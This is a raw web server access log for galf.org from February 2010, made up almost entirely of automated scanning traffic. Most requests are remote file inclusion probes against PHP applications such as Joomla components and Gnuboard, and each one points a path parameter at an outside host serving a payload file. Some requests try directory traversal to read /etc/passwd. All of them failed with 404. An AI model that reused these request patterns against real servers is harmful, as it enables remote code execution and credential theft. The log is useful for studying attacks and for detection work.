58.150.99.131 - - [07/Feb/2010:20:48:50 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:48:50 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:48:59 -0800] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:48:59 -0800] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.150.99.131 - - [07/Feb/2010:20:48:59 -0800] "GET /logs/access_090720.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://musicadelibreria.net/footer?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.74 - - [07/Feb/2010:20:50:30 -0800] "GET /logs/access.log%20%20/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.74 - - [07/Feb/2010:20:50:30 -0800] "GET /logs/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
121.88.4.74 - - [07/Feb/2010:20:50:30 -0800] "GET /write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
65.55.51.110 - - [07/Feb/2010:20:50:31 -0800] "GET /tmp/ HTTP/1.1" 200 520 "-" "msnbot/2.0b (+http://search.msn.com/msnbot.htm)" "www.galf.org"
121.88.4.74 - - [07/Feb/2010:20:51:03 -0800] "GET /logs/access_100201.log%20%20/write_update.php?board_skin_path=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:20:52:42 -0800] "GET /good.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:20:52:42 -0800] "GET /logs/access_100201.log//good.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:20:52:42 -0800] "GET /logs//good.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:20:52:43 -0800] "GET /logs/access.log//good.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [07/Feb/2010:20:52:54 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [07/Feb/2010:20:52:54 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [07/Feb/2010:20:52:54 -0800] "GET /logs/access_090720.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:20:56:25 -0800] "GET /logs/access_100201.log//good.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:20:56:26 -0800] "GET /good.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:20:56:26 -0800] "GET /logs//good.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:20:57:08 -0800] "GET /logs/access_100201.log//good.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:20:57:08 -0800] "GET /good.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:20:57:08 -0800] "GET /logs//good.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.90.47.134 - - [07/Feb/2010:20:57:08 -0800] "GET /logs/access.log//good.php?board_skin_path=http://xalsupport.com/images/icon.gif??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.193.10.130 - - [07/Feb/2010:20:59:01 -0800] "GET /logs/access_090824.log%20%20//skin/zero_vote/error.php?dir=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
110.45.146.84 - - [07/Feb/2010:20:59:04 -0800] "GET /logs/access.log//good.php?board_skin_path=http://bwbministries.com/images/r8_c11.gif??? HTTP/1.1" 404 - "-" "libwww-perl/5.79" "www.galf.org"
201.28.110.99 - - [07/Feb/2010:21:01:49 -0800] "GET /logs/access_091116.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [07/Feb/2010:21:02:43 -0800] "GET /logs/access_100104.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
201.28.110.99 - - [07/Feb/2010:21:06:16 -0800] "GET /administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
201.28.110.99 - - [07/Feb/2010:21:06:16 -0800] "GET /logs/access.log//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
201.28.110.99 - - [07/Feb/2010:21:06:16 -0800] "GET /logs//administrator/components/com_serverstat/install.serverstat.php?mosConfig_absolute_path=http://www.perikritis.gr/phpBB2/admin/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
58.230.162.220 - - [07/Feb/2010:21:07:30 -0800] "GET /logs/access.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:07:30 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.0" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:07:30 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:07:32 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:07:32 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:07:32 -0800] "GET /logs/access.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:21:08:20 -0800] "GET /logs/access_090810.log//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:21:08:20 -0800] "GET /logs//components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
84.33.199.19 - - [07/Feb/2010:21:08:20 -0800] "GET /components/com_extcalendar/lib/mail.inc.php?CONFIG_EXT[LIB_DIR]=http://tahede.t35.com/tian/idxx.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:08:26 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:08:26 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:08:26 -0800] "GET /logs/access.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:08:28 -0800] "GET /logs/access_100201.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:08:29 -0800] "GET /logs/access_100201.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
58.230.162.220 - - [07/Feb/2010:21:09:22 -0800] "GET /logs/access_100201.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:10:38 -0800] "GET /phpsecurityadmin/include/logout.php?PSA_PATH=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:10:38 -0800] "GET /logs//phpsecurityadmin/include/logout.php?PSA_PATH=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.193.10.130 - - [07/Feb/2010:21:12:26 -0800] "GET /logs/access_090928.log//skin/zero_vote/error.php?dir=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.193.10.130 - - [07/Feb/2010:21:15:41 -0800] "GET /logs/access_090824.log//skin/zero_vote/error.php?dir=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
212.193.10.130 - - [07/Feb/2010:21:18:29 -0800] "GET /logs//skin/zero_vote/error.php?dir=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.193.10.130 - - [07/Feb/2010:21:18:29 -0800] "GET /skin/zero_vote/error.php?dir=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.193.10.130 - - [07/Feb/2010:21:18:29 -0800] "GET /logs/access.log//skin/zero_vote/error.php?dir=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
212.193.10.130 - - [07/Feb/2010:21:19:06 -0800] "GET /logs/access_100201.log//skin/zero_vote/error.php?dir=http://rkparadiseacademy.org/cp/scripts/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:21:19:39 -0800] "GET /logs/access_091207.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:21:19:39 -0800] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:21:19:39 -0800] "GET /logs//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:21:19:39 -0800] "GET /include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:21:19:39 -0800] "GET /logs/access_091207.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:21:19:39 -0800] "GET /logs//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:21:20:11 -0800] "GET /logs/access_091130.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
220.73.144.196 - - [07/Feb/2010:21:20:12 -0800] "GET /logs/access_091130.log%20%20//include.newsletter_jobs_subnav.php?cfg[path][contenido]=http://www.outdoorbooks.co.kr/admin/category/1.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
87.250.252.242 - - [07/Feb/2010:21:27:29 -0800] "GET /logs/access_091207.log HTTP/1.1" 200 7193692 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.galf.org"
109.123.78.44 - - [07/Feb/2010:21:30:07 -0800] "GET /xoopsgallery/init_basic.php?GALLERY_BASEDIR=http://www.eywestco.co.kr/upfiles/log.txt?? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "galf.org"
211.192.139.164 - - [07/Feb/2010:21:33:09 -0800] "GET /bbs//write_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:21:33:10 -0800] "GET /logs//bbs/write_update.php//board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:21:33:10 -0800] "GET /logs/access.log//bbs/write_update.php//board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:21:33:10 -0800] "GET /bbs/write_update.php//board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:21:33:25 -0800] "GET /logs/access_100201.log//bbs/write_update.php//board/bbs/write_update.php//bbs//write_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
211.192.139.164 - - [07/Feb/2010:21:33:49 -0800] "GET /logs/access_100201.log//bbs//write_update.php?board_skin_path=http://sisi123.fileave.com/id1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:37:45 -0800] "GET /logs/access.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:37:50 -0800] "GET /bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:37:50 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.103.87.96 - - [07/Feb/2010:21:37:59 -0800] "GET /logs/init_basic.php?GALLERY_BASEDIR=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.103.87.96 - - [07/Feb/2010:21:37:59 -0800] "GET /logs/access.log/init_basic.php?GALLERY_BASEDIR=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
222.103.87.96 - - [07/Feb/2010:21:37:59 -0800] "GET /init_basic.php?GALLERY_BASEDIR=http://www.nanumsoft.com/gnuboard4/data/session/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "galf.org"
200.93.147.154 - - [07/Feb/2010:21:41:02 -0800] "GET /logs/access_100201.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:41:03 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:41:03 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:41:08 -0800] "GET /logs/access_091026.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:41:43 -0800] "GET /index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:41:43 -0800] "GET /logs//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:41:43 -0800] "GET /logs/access_091026.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:41:44 -0800] "GET /logs/phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:41:45 -0800] "GET /logs/access_090720.log/phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:41:47 -0800] "GET /phphtml.php?htmlclass_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:42:37 -0800] "GET /logs/access_091026.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:44:59 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:44:59 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:45:20 -0800] "GET /logs//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:45:20 -0800] "GET /logs/access.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:45:20 -0800] "GET /bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:47:05 -0800] "GET /logs/access.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:47:08 -0800] "GET /logs//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:47:59 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:48:48 -0800] "GET /logs/access_100201.log%20%20//bbs//delete_all.php?board_skin_path=http://www.howtolisten.kr//bbs/data/community_freeboard/1262568611/img00.txt???? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.198.155 - - [07/Feb/2010:21:49:11 -0800] "GET /home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
124.217.198.155 - - [07/Feb/2010:21:49:11 -0800] "GET /logs/home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
124.217.198.155 - - [07/Feb/2010:21:49:11 -0800] "GET /logs/access_100104.log/home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
124.217.198.155 - - [07/Feb/2010:21:49:11 -0800] "GET /logs/access_091228.log/home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:21:49:47 -0800] "GET /logs//bbs/write_comment_update.php/?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:21:49:47 -0800] "GET /logs/access.log%20%20//bbs/write_comment_update.php/?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:21:49:47 -0800] "GET /bbs/write_comment_update.php/?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:49:57 -0800] "GET /logs/access_091116.log%20%20//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:50:12 -0800] "GET /logs/access_100201.log%20%20//bbs//write_comment_update.php?board_skin_path=http://www.hubns.co.kr//data/list/heheh.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.239.227.34 - - [07/Feb/2010:21:50:23 -0800] "GET /logs/access_100201.log%20%20//bbs/write_comment_update.php/?board_skin_path=http://zerozon.co.kr/photos/count/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:21:52:16 -0800] "GET /logs/access_090720.log//index.php?autoLoadConfig[999][0][autoType]=include&autoLoadConfig[999][0][loadFile]=http://www.justice.gov.ge//album/respon1.txt?%20? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
124.217.198.155 - - [07/Feb/2010:21:52:23 -0800] "GET /logs/access_100104.log%20/home.php?content=../../../../../../../../../../../../../etc/passwd%00 HTTP/1.1" 404 - "-" "libwww-perl/5.805" "www.galf.org"
62.197.206.200 - - [07/Feb/2010:21:55:04 -0800] "GET /includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.abcpl.mobi/rss/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.197.206.200 - - [07/Feb/2010:21:55:04 -0800] "GET /logs/access_090720.log//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.abcpl.mobi/rss/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
62.197.206.200 - - [07/Feb/2010:21:55:04 -0800] "GET /logs//includes/mailaccess/pop3.php?CONFIG[pear_dir]=http://www.abcpl.mobi/rss/unix1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.2.122 - - [07/Feb/2010:21:55:52 -0800] "GET /delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.2.122 - - [07/Feb/2010:21:56:35 -0800] "GET /logs/access_100201.log//delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.2.122 - - [07/Feb/2010:21:56:35 -0800] "GET /logs/access.log//delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
222.231.2.122 - - [07/Feb/2010:21:56:35 -0800] "GET /logs//delete_all.php?board_skin_path=http://kidosuh.or.kr/zb41pl8/bbs/skin/buzzard_espoon/.../1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
69.174.48.203 - - [07/Feb/2010:22:00:26 -0800] "GET /e404.php?DOCUMENT_ROOT=http://www.rollingcamper.com//administrator/modules/mod_submenu/.3/idv5.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.834" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:01:01 -0800] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2010/2/6/2751992/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:01:01 -0800] "GET /logs/access_091116.log%20%20//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2010/2/6/2751992/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
200.93.147.154 - - [07/Feb/2010:22:01:01 -0800] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://www.fileden.com/files/2010/2/6/2751992/id1.txt? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.galf.org"
